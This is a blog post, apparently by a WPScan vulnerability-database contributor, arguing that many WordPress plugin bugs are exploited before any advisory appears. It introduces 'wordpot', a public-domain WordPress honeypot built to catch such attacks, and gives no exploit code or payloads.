Written on

Hunting Wordpress Exploitation in the Wild

A thing I noticed working day by day on WPScan's vulnerability database is that many of the Wordpress (plugins) vulns disclosed are far less than the actual number of exploitable plugins. A quick trip on the official directory and a little browsing over the svn repositories will point out a lot of trivial bugs which might be worth an advisory. I am talking about low hanging fruits like unsophisticated xss and basic sqli.

For example some time ago we were debunking a fake advisory with Ryan and we found out a bunch of xss on the very same plugin just by running DevBug (which was not optimized for Wordpress code). There is a gold mine of easy bugs down there.

The hassle is that properly disclosing a vuln takes a lot of time: you should find it, test it, warn the author, warn Automattic, and publish an advisory. If you find an unresponsive author it may take up to a month and meanwhile an horde of new plugins are published. We can't keep up and most of the time it's not worth it.

And what if down the mine there is a true gem nobody knows yet? What if it's first found by someone with malicious intents? That's the problem: a vuln exploited before the advisory. And WPscan relies on advisories as it's main source of data. You do the math.

Having fresh data is crucial: from a defensive stand point an average Wordpress user should care far more about actively exploited vulns than random bugs on his installed plugins. In the end if a vulnerability is not exploited it's not a real menace (just a potential one). For example I personally like how recurrently a vulnerable timthumb file is found inside a plugin and a wave of wild exploitation arise.

To cath those attacks the approach is standard: honeypots.

This should also be how many commercial appsec vendors like SpiderLabs and Sucuri are detecting attacks. SpiderLabs seems to have a web app honeypot (general purpose? Wordpress specific?) while at Sucuri they might just monitor their client's Wordpress installations since they seems to have a large wordpress-centric user base.

I am just speculating since nobody is kind enough to share their secrets. The best tool available so far is Glastopf which is general purpose and quite useless in our case.

So to cope with the loss of proper tools I've built a Wordpress honeypot from scratch in the hope to catch some exploitation and provide the WPScan project with fresh data. It's called wordpot and is public domain.

If you were thinking about contributing to WPScan in a way or another starting now you can also help by installing wordpot and let us know how it goes.